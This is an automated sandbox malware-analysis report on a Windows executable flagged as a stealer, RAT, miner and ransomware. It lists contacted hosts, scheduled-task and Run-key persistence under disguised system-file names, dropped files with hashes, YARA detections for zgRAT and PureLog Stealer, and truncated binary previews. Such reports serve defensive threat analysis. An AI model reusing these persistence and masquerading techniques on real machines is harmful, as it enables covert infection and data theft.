                                                                                                                                                                    http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);based.exe, 00000011.00000003.1818177199.000002A15D874000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      https://gateway.discord.ggRuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4Nhacn.exe, 00000012.00000003.1816415919.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812268854.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1811643648.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://oneget.orgpowershell.exe, 00000001.00000002.1795294245.000001F5BDE82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.based.exe, 00000011.00000003.1876089664.000002A15E023000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1977794400.000002A15DD06000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DD06000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910087038.000002A15E023000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                              162.159.130.234
                                                                                                                                                                              gateway.discord.ggUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                              Analysis ID:1485949
                                                                                                                                                                              Start date and time:2024-08-01 10:56:13 +02:00
                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                              Overall analysis duration:0h 14m 2s
                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                              Report type:full
                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                              Number of analysed new started processes analysed:98
                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                              Technologies:
                                                                                                                                                                              • HCA enabled
                                                                                                                                                                              • EGA enabled
                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                              Sample name:87Bym0x4Fy.exe
                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                              Original Sample Name:7AA4185295AB3F4F896704AED05C0795.exe
                                                                                                                                                                              Detection:MAL
                                                                                                                                                                              Classification:mal100.rans.spre.troj.spyw.expl.evad.mine.winEXE@150/148@1/1
                                                                                                                                                                              EGA Information:
                                                                                                                                                                              • Successful, ratio: 66.7%
                                                                                                                                                                              HCA Information:Failed
                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, conhost.exe, WmiPrvSE.exe, schtasks.exe
                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 142.250.185.131, 20.114.59.183, 20.166.126.56, 20.189.173.22, 20.242.39.171
                                                                                                                                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, pool.hashvault.pro, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, gstatic.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, umwatson.events.data.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                                                                              • Execution Graph export aborted for target RuntimeBroker2.0.exe, PID 7176 because it is empty
                                                                                                                                                                              • Execution Graph export aborted for target hacn.exe, PID 7772 because there are no executed function
                                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 6232 because it is empty
                                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 7068 because it is empty
                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                              04:57:09API Interceptor225x Sleep call for process: powershell.exe modified
                                                                                                                                                                              04:57:26API Interceptor1x Sleep call for process: setup.exe modified
                                                                                                                                                                              04:57:27API Interceptor2x Sleep call for process: SIHClient.exe modified
                                                                                                                                                                              04:57:29API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                                                                                                              04:57:33API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                              04:58:19API Interceptor27785x Sleep call for process: cmd.exe modified
                                                                                                                                                                              04:58:19API Interceptor44248x Sleep call for process: based.exe modified
                                                                                                                                                                              04:58:19API Interceptor69941x Sleep call for process: conhost.exe modified
                                                                                                                                                                              04:58:19API Interceptor3144x Sleep call for process: svchost.exe modified
                                                                                                                                                                              09:57:40Task SchedulerRun new task: cscript path: "C:\Users\user\cscript.exe"
                                                                                                                                                                              09:57:40Task SchedulerRun new task: cscriptc path: "C:\Users\user\cscript.exe"
                                                                                                                                                                              09:57:42AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run cscript "C:\Users\user\cscript.exe"
                                                                                                                                                                              09:57:43Task SchedulerRun new task: cmd path: "C:\Program Files\Uninstall Information\cmd.exe"
                                                                                                                                                                              09:57:44Task SchedulerRun new task: cmdc path: "C:\Program Files\Uninstall Information\cmd.exe"
                                                                                                                                                                              09:57:44Task SchedulerRun new task: dasHost path: "C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\dasHost.exe"
                                                                                                                                                                              09:57:44Task SchedulerRun new task: dasHostd path: "C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\dasHost.exe"
                                                                                                                                                                              09:57:44Task SchedulerRun new task: powershell path: "C:\Users\user\NetHood\powershell.exe"
                                                                                                                                                                              09:57:44Task SchedulerRun new task: powershellp path: "C:\Users\user\NetHood\powershell.exe"
                                                                                                                                                                              09:57:44Task SchedulerRun new task: RKjtGQcyio path: "C:\Program Files (x86)\windows mail\RKjtGQcyio.exe"
                                                                                                                                                                              09:57:44Task SchedulerRun new task: RKjtGQcyioR path: "C:\Program Files (x86)\windows mail\RKjtGQcyio.exe"
                                                                                                                                                                              09:57:47Task SchedulerRun new task: GoogleUpdateTaskMachineQC path: %ProgramFiles%\Google\Chrome\updater.exe
                                                                                                                                                                              09:57:51AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run powershell "C:\Users\user\NetHood\powershell.exe"
                                                                                                                                                                              09:58:01AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RKjtGQcyio "C:\Program Files (x86)\windows mail\RKjtGQcyio.exe"
                                                                                                                                                                              09:58:09AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run cmd "C:\Program Files\Uninstall Information\cmd.exe"
                                                                                                                                                                              09:58:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dasHost "C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\dasHost.exe"
                                                                                                                                                                              09:58:31AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run cscript "C:\Users\user\cscript.exe"
                                                                                                                                                                              09:58:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run powershell "C:\Users\user\NetHood\powershell.exe"
                                                                                                                                                                              09:58:53AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RKjtGQcyio "C:\Program Files (x86)\windows mail\RKjtGQcyio.exe"
                                                                                                                                                                              09:59:02AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run cmd "C:\Program Files\Uninstall Information\cmd.exe"
                                                                                                                                                                              09:59:11AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dasHost "C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\dasHost.exe"
                                                                                                                                                                              09:59:20AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run cscript "C:\Users\user\cscript.exe"
                                                                                                                                                                              09:59:28AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run powershell "C:\Users\user\NetHood\powershell.exe"
                                                                                                                                                                              09:59:37AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RKjtGQcyio "C:\Program Files (x86)\windows mail\RKjtGQcyio.exe"
                                                                                                                                                                              09:59:45AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run cmd "C:\Program Files\Uninstall Information\cmd.exe"
                                                                                                                                                                              No context
                                                                                                                                                                              No context
                                                                                                                                                                              No context
                                                                                                                                                                              No context
                                                                                                                                                                              No context
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (962), with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):962
                                                                                                                                                                              Entropy (8bit):5.907918982685397
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:dejlkSoPPOXVXvy/oe+sSm/Oc1cJMaZLZrihC9j966T0M9naAKbdzIkC8G:QJkSSwvy/T1+mC9j9MO40kG
                                                                                                                                                                              MD5:1D4EDB9E4C6548904258A5402089DB09
                                                                                                                                                                              SHA1:5D934E664F95C2A8CC46A869735E80CBDEBF3098
                                                                                                                                                                              SHA-256:622D1FDBDC888324773692E7EF09682B58EA182E1D5EDC707835039E74F6C511
                                                                                                                                                                              SHA-512:0C90E42E9A04C1B1FD7F009B5215DE1909D1BA8BD786959CCC513D8D5A5845521C7665C29E535EADEE5436BD37BD87560B947660C019B4E2820ECEB0FCD53653
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:Q6Hg7uViRqB5zIOV0OJfpWtZUCZH25LeXYSbQTBaeMjN9YM7AeSjJXR4NrL4VNqVfhia0wFhNtAcwfa60cGYnlV9HYOjHGEQgNrc0vGNYuWZWyHrQPE3GRs4MiTcigaGpu6jx7FEV393O5nSQgS1CLJOfxPSbop2TPum2i4TKAhNRzpQ4BLCOiEdkrDArwmrNHj9LBZsm9rCn56qI9XacnovKQBKe3lXX0AKPpE3ldZO1CzouX2sYMOjcyy5AONsXTox5wac4ey8NZ3HaWaGB38Llarb0J3XPr1hYCt86ax4XPVD4qenyGreUcLeE9lvkbtgiWtYmcKkFEyVEohJpPiI9WM60O37zBT6gzei7FAW6GZQozZZcbGU2kgMJxhYiMvDu1zPJ8MjOML376RAydfX59E5SSZKimxuUVgwAKPdOgFpYnPNfgjEqYIvx361jCBmZbilZfAoOCJZ3YhpDMoBCsD6Nv9HOY4MfdQ7EnxAg50oPs1YWQyXXAjqXmYof2azI63ZIjlaYoeH2Zre3kv7jgzf4jkbOIeofAgSzbQwpY8sfby754u5GdPlHYfi8JLPK0m13YpbU8RLiG9cvmgUYjhCu4La5syfMsipz6EgPSlILEDBZDwVn11lSjG8NOglKv9zhUmzi9FF7Z0q1KB15c2V07WPzGTAw97ZFOdEb7xovwn3taGDMoqr3n8k7W9cqES8balnq6a8pNjEUdgZ9PxITQgbP3HF7V8reobSydWQNrBpD4PezjcaQJpL4JXxzUAUP2jpBOlg2h4lO0YVnnQX2hbV9QXoFjb3qrZLUkck86htOD6EvCJMEncraOqv16aTGB4haMADKpZ5AsG5TT3CZPyDPsuG3rtCfNmNIZnjCGBYNgrsHubiCY40M1Rsb3Jc6WZxF3x3qU9TNaztBC9JQK9HTwARH4HJ6jb1G4nO7h1sYlnwBirZ49MvWS
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3720704
                                                                                                                                                                              Entropy (8bit):7.733352681119499
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
                                                                                                                                                                              MD5:5FE249BBCC644C6F155D86E8B3CC1E12
                                                                                                                                                                              SHA1:F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
                                                                                                                                                                              SHA-256:9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
                                                                                                                                                                              SHA-512:B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe, Author: Joe Security
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                              • Antivirus: Virustotal, Detection: 58%, Browse
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3720704
                                                                                                                                                                              Entropy (8bit):7.733352681119499
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
                                                                                                                                                                              MD5:5FE249BBCC644C6F155D86E8B3CC1E12
                                                                                                                                                                              SHA1:F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
                                                                                                                                                                              SHA-256:9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
                                                                                                                                                                              SHA-512:B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe, Author: Joe Security
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                              • Antivirus: Virustotal, Detection: 58%, Browse
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                              Entropy (8bit):5.689397478284489
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Uk3LEd6JCRwhoyBQ7SsPgVEcc2iDRsCLOr0MXfRh8HQUNtkGqkEhRicZdxF6n:j3RJC+EbQW2iDKCLEBq7tkZkIRiS6n
                                                                                                                                                                              MD5:DA6322BAB926B0BA5786849D5491104B
                                                                                                                                                                              SHA1:5766624028A950879324AD9687FF6C2294D4B52E
                                                                                                                                                                              SHA-256:3E1C9C6844BFED0214D35E868F08E09857F0CE9615245D6D782F4884022B4CCC
                                                                                                                                                                              SHA-512:4F1A6C24D78AF023D58298CD657A497700A6BBE4F16D0C4FFEA166A6426F31FC07A841DBCC3D6605DFE2D718A9C3B172FDE1A220A118D1621A9D283B2E0ADBA4
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:p0extw2xv15Rn0WVlv3DLMj2obAxjoge7ElgEN74UedMsJP4qduzv89cQlIRwFOGVbUiP0QXy9srtXJfMFGF4rs9FIPdEqIPQX0Ryqo0NWBvPSt2cmEq8IMosVcHkxSH1daWg2rfbQ1hp7txZWAcmbRHKMjdOhPaD44v1XWj5iPrQo8vlpsN
                                                                                                                                                                              Process:C:\ProgramData\setup.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):5617152
                                                                                                                                                                              Entropy (8bit):7.71585644239634
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:98304:Dei3W2HJn8hqIOLmRLRSo+QqvCRs19A3JIkLJQrAtjRQii7yXdmMpy2N:6Z2i4OcxQECE6ZIkLJIAt8y4
                                                                                                                                                                              MD5:1274CBCD6329098F79A3BE6D76AB8B97
                                                                                                                                                                              SHA1:53C870D62DCD6154052445DC03888CDC6CFFD370
                                                                                                                                                                              SHA-256:BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
                                                                                                                                                                              SHA-512:A0FEBBD4915791D3C32531FB3CF177EE288DD80CE1C8A1E71FA9AD59A4EBDDEEF69B6BE7F3D19E687B96DC59C8A8FA80AFFF8378A71431C3133F361B28E0D967
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                              • Antivirus: Virustotal, Detection: 79%, Browse
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.v....U................@.............................PV.......U...`... ...............................................V......0V.......U..............@V.x.............................U.(.....................V.X............................text....u.......v..................`..`.data...`.U.......U..z..............@....rdata..`.....U......|U.............@..@.pdata........U.......U.............@..@.xdata........U.......U.............@..@.bss.... .....U..........................idata........V.......U.............@....CRT....`.....V.......U.............@....tls......... V.......U.............@....rsrc........0V.......U.............@....reloc..x....@V.......U.............@..B........................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3720704
                                                                                                                                                                              Entropy (8bit):7.733352681119499
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
                                                                                                                                                                              MD5:5FE249BBCC644C6F155D86E8B3CC1E12
                                                                                                                                                                              SHA1:F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
                                                                                                                                                                              SHA-256:9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
                                                                                                                                                                              SHA-512:B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Uninstall Information\cmd.exe, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Uninstall Information\cmd.exe, Author: Joe Security
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                              • Antivirus: Virustotal, Detection: 58%, Browse
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):5.143983303761562
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Sih2d1nwonzUBEU5Hr+/mN91u:Sih2d1HU5Hy+Nm
                                                                                                                                                                              MD5:65142D043E011D6C49A3A6E96AE22E05
                                                                                                                                                                              SHA1:F7375B600A1CE911AF2FD087E062FFBBCAC1D70B
                                                                                                                                                                              SHA-256:A5080E38CC0AFFD116877A42EC02831AABAEBCE050CB33E93ECCF018D78C0A22
                                                                                                                                                                              SHA-512:9998B8602A77C005F82EE981FBB0FFCF8AECC7FEB4FAC043013FF41E1E1D54B029898AA5BEBB2B05AAA5515DDF9C71EE8E40D8E3C6EFD8FAF45353B2A2EBC4BB
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:86BAbgDMj1fOx1izBoNZejiMCQrRVqzLMrntqNUUbNmbpFfWsE9xQWjYXz8K
                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                              Entropy (8bit):1.1747061550666387
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:sRuew4l+k5P08rLVsaWgdl/N6fmzuiFcZ24lO8v:euew40ki8rLVsar/gfmzuiFcY4lO8v
                                                                                                                                                                              MD5:7DA67E995282A76FC8922AEAC706614A
                                                                                                                                                                              SHA1:FDD1B452FE6EB500A59248836EA311ADE58986C3
                                                                                                                                                                              SHA-256:DF17B9824DFEC6828BE84D63B1F7B2D9A601D2BB4531070C1796ADA995BE8C16
                                                                                                                                                                              SHA-512:F85EB6DF6A09B5DC163E4CA8D432004D7CFD73BFD67FDB4280854312B213EE32E0B360719C66A89A0F6FB73AAAE528B2AA0C3B46E32A7D356F5F9F65ABCE76A9
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.9.7.6.2.3.0.7.9.0.3.4.6.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.9.7.6.2.3.1.8.5.2.8.5.1.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.2.c.f.3.a.5.f.-.d.9.9.5.-.4.a.0.6.-.9.3.e.6.-.c.7.d.e.0.9.f.7.b.7.9.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.7.9.3.0.8.8.d.-.a.3.3.9.-.4.5.5.a.-.a.3.9.a.-.f.1.b.4.2.c.5.6.8.7.5.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.R.u.n.t.i.m.e.B.r.o.k.e.r.2...0...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.u.n.t.i.m.e.B.r.o.k.e.r.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.0.8.-.0.0.0.1.-.0.0.1.4.-.4.1.f.2.-.3.e.c.a.f.0.e.3.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.f.b.8.1.d.f.2.1.9.9.2.2.d.c.9.7.e.2.2.d.5.c.7.b.d.1.d.b.d.d.c.0.0.0.0.0.0.0.0.!.0.0.0.0.d.3.5.9.a.b.c.0.e.b.b.9.8.7.7.c.9.1.7.e.1.2.5.f.b.4.e.2.8.c.2.4.b.2.7.6.9.6.a.4.
                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                              File Type:Mini DuMP crash report, 16 streams, Thu Aug 1 08:57:11 2024, 0x1205a4 type
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):546105
                                                                                                                                                                              Entropy (8bit):2.917742919736517
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:m+Nj6PFC4LBoVmfyBOXpIymdSZQy+/yhSZ7+4awRZcSVWvbQ1CCq5wWRTA3+vPt0:moO3MyhSZiAc6q5w0TA3Qmo
                                                                                                                                                                              MD5:21F2A4926DD0995C93B239C52B03F524
                                                                                                                                                                              SHA1:DC5ABC434FC6D8F1E68470C6056C677791519954
                                                                                                                                                                              SHA-256:740AF3A9A2C9F7DDFF88045C5D659A82800C26A14F7154E13414E7F780B971DB
                                                                                                                                                                              SHA-512:53859A4FD3179EC97AE629F5E6B7ED424E1E8788AA8A3DC1FD93AD2D02BA58F93186D892DDBA28DBF33EB771E8E0EC5761BBE130346652353C7323DED3E60E82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
